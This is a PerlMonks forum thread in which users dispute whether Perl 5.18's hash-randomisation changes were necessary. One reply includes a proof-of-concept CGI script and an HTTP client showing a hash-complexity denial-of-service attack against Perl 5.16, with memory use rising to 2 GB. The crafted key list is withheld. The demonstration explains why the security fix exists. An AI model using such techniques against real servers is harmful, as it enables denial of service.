in reply to Re^12: Our perl/xs/c app is 30% slower with 64bit 5.24.0, than with 32bit 5.8.9. Why?
in thread Our perl/xs/c app is 30% slower with 64bit 5.24.0, than with 32bit 5.8.9. Why?

Your very first post on this topic made an unevidenced assertion that the hash-related security fixes done in 5.18.0 were both unnecessary and may have significantly slowed the perl interpreter.

No. I offered the possibility that one of the differences visible from the scant information provided, was that the different hashing algorithm might be responsible for the slowdown. Eg, It might be that the OPs data invoked a pathological behaviour with the new algorithm, but not with the old.

Given it is a simple recompile to verify one way or the other, why wouldn't he check.

I also mentioned in passing that (IMO) the change of algorithm was unnecessary. No assertion; just my opinion. An opinion that you have said nothing to change.

It's inflammatory because you've taken a in-passing expression of my opinion, and made a mountain out of a molehill. Deliberately inflaming a thread with a discussion that has no benefit to the OP nor merit to this place.

That's utterly trivial. You send a HTTP request to the server with a bunch of headers or parameters containing the generated keys.

You might just as well send a request that contains a 100 billion headers.

Or you could supply some JSON to a server that processes JSON input.

To the same perl process that supplied you with the headers. Hm.

Think of a spam filter that reads an email's headers into a hash for one hypothetical example of many

So how does the attacker persuade the spam filter to give him an unsorted set of hash keys in order that he can find the seed to generate the headers?

The biggie was that if you supplied a suitable small set of keys in a request (no need to know the server's seed) you could force the perl process to allocate Gb's worth of memory.

Care to supply me with a suitable set of keys such that I can test that assertion? Because outside of this (new to me) claim, you've still to present a realistic scenario for an exploit.

With the rise and rise of 'Social' network sites: 'Computers are making people easier to use everyday'
Examine what is said, not who speaks -- Silence betokens consent -- Love the truth but pardon error.
"Science is about questioning the status quo. Questioning authority". The enemy of (IT) success is complexity.
In the absence of evidence, opinion is indistinguishable from prejudice.
  • Comment on Re^13: Our perl/xs/c app is 30% slower with 64bit 5.24.0, than with 32bit 5.8.9. Why?

Replies are listed 'Best First'.
Re^14: Our perl/xs/c app is 30% slower with 64bit 5.24.0, than with 32bit 5.8.9. Why?
by dave_the_m (Monsignor) on Dec 22, 2016 at 22:14 UTC
    You might just as well send a request that contains a 100 billion headers
    Ok, I give up.

    The whole point of a complexity attack is that you can produce the same bad effects of sending a 100 billion headers to a server by just sending a couple of Kbyte's worth instead.

    Dave.

[reply]

      Dave

      Thank you for trying so hard and so patiently to inject facts into this thread. The irony of you being accused of making inflammatory statements is rich. Thanks for all your great work on Perl, some of us really appreciate it.

      Grant

[reply]
        Thanks for all your great work on Perl, some of us really appreciate it.

        And so do I. Which is why he has always commanded my utmost respect for his willingness to interact with us mere mortals in this forum.

        Even when he has not responded in kind. Even in this thread, I congratulated him for his continued, valued, expert contributions.

        But he didn't create the code in question. I'm not questioning him or his frankly amazing, ongoing contributions to Perl; but rather the code produced by a third party, that for some reason he feels the need to defend.

        ... inject facts into this thread. The irony ...

        Irony indeed. From the pop-up expert who has an overall posting rate of 0.12 posts per day; but who's contribution rate for the last 3 years has been 0.00737 posts/day.

        "Facts" require evidence; none of which has been provided. Look up the word "hearsay". Dave_the_M has my utmost respect; but not hero worship.

        If he treated me with the same respect I've afforded him; this subthread would not exist.

        With the rise and rise of 'Social' network sites: 'Computers are making people easier to use everyday'
        Examine what is said, not who speaks -- Silence betokens consent -- Love the truth but pardon error.
        "Science is about questioning the status quo. Questioning authority". The enemy of (IT) success is complexity.
        In the absence of evidence, opinion is indistinguishable from prejudice.
[reply]
      Ok, I give up.

      Good. Until someone demonstrates an exploit, end-to-end, with realistic data and scenario, I'll value my own analysis over suspect theoretical speculation and retain and express my opinion based upon that analysis.

      With the rise and rise of 'Social' network sites: 'Computers are making people easier to use everyday'
      Examine what is said, not who speaks -- Silence betokens consent -- Love the truth but pardon error.
      "Science is about questioning the status quo. Questioning authority". The enemy of (IT) success is complexity.
      In the absence of evidence, opinion is indistinguishable from prejudice.
[reply]
        Good. Until someone demonstrates an exploit, end-to-end, with realistic data and scenario, I'll value my own analysis over suspect theoretical speculation and retain and express my opinion based upon that analysis.
        I have on my laptop a text file called 'keys', which I am *not* going to make publicly available, but which was generated by someone 3 years ago. It contains 350 short words, one per line, each matching /^[a-z]{2,7}$/. The whole file is under 2Kbytes.

        Here is a small CGI script I have installed on a local apache web server. It uses bog-standard CGI.pm to process any received parameters. 

        #!/var/www/cgi-bin/d/perl-5.16.0.out/bin/perl5.16.0

use CGI;
my $q = CGI->new;
print $q->header();
print $q->start_html('hello world');

my @keys = $q->param;
printf "[[received %3d params; used %4dMbyte of RSZ]]<br>\n",
        scalar @keys, rsz();
print $q->end_html;

# use PS to get the resident memory size of the current process
sub rsz {
    return int($1 * 4096 / 1024 / 1024) if `ps -p $$ -o rsz` =~ /(\d+)
+/;
    return 0;
}

        [download]
        and here is a small HTTP client script. It reads that list of keys, then sends a series of simple HTTP requests including longer and longer subsets of those keys as parameters. The reply from the CGI script shows how much memory it used. 
        #!/usr/bin/perl

use strict;
use warnings;

use LWP::UserAgent; 
use HTTP::Request::Common qw{ POST };

my @keys = <>;
chomp for @keys;

my $start = time;

for (my $i = 10; $i <= 350; $i += 10) {
    my @params = map { $_ => 1 } @keys[0..$i-1];

    my $url = 'http://localhost/cgi-bin/index.cgi';
    my $ua      = LWP::UserAgent->new();
    my $request = POST( $url, [ @params ] );

    my $content = $ua->request($request)->as_string();
    $content =~/\[\[(.*)\]\]/ or die "unexpected response";
    print $1, "\n";
}
printf "TOTAL time %ds\n", time - $start;

        [download]
        And here is the result of running that client script: 
        $ ./client keys
received  10 params; used   24Mbyte of RSZ
received  20 params; used   24Mbyte of RSZ
received  30 params; used   24Mbyte of RSZ
received  40 params; used   24Mbyte of RSZ
received  50 params; used   24Mbyte of RSZ
received  60 params; used   24Mbyte of RSZ
received  70 params; used   24Mbyte of RSZ
received  80 params; used   24Mbyte of RSZ
received  90 params; used   23Mbyte of RSZ
received 100 params; used   24Mbyte of RSZ
received 110 params; used   24Mbyte of RSZ
received 120 params; used   24Mbyte of RSZ
received 130 params; used   24Mbyte of RSZ
received 140 params; used   24Mbyte of RSZ
received 150 params; used   24Mbyte of RSZ
received 160 params; used   24Mbyte of RSZ
received 170 params; used   25Mbyte of RSZ
received 180 params; used   25Mbyte of RSZ
received 190 params; used   25Mbyte of RSZ
received 200 params; used   28Mbyte of RSZ
received 210 params; used   28Mbyte of RSZ
received 220 params; used   32Mbyte of RSZ
received 230 params; used   32Mbyte of RSZ
received 240 params; used   39Mbyte of RSZ
received 250 params; used   56Mbyte of RSZ
received 260 params; used   56Mbyte of RSZ
received 270 params; used   87Mbyte of RSZ
received 280 params; used  152Mbyte of RSZ
received 290 params; used  152Mbyte of RSZ
received 300 params; used  279Mbyte of RSZ
received 310 params; used  280Mbyte of RSZ
received 320 params; used  536Mbyte of RSZ
received 330 params; used 1047Mbyte of RSZ
received 340 params; used 1047Mbyte of RSZ
received 350 params; used 2071Mbyte of RSZ
TOTAL time 2s

        [download]
        Note that I can trivially force the CGI script to allocate as much memory as I desire.

        Dave.

[reply]
[d/l]
[select]

In Section Seekers of Perl Wisdom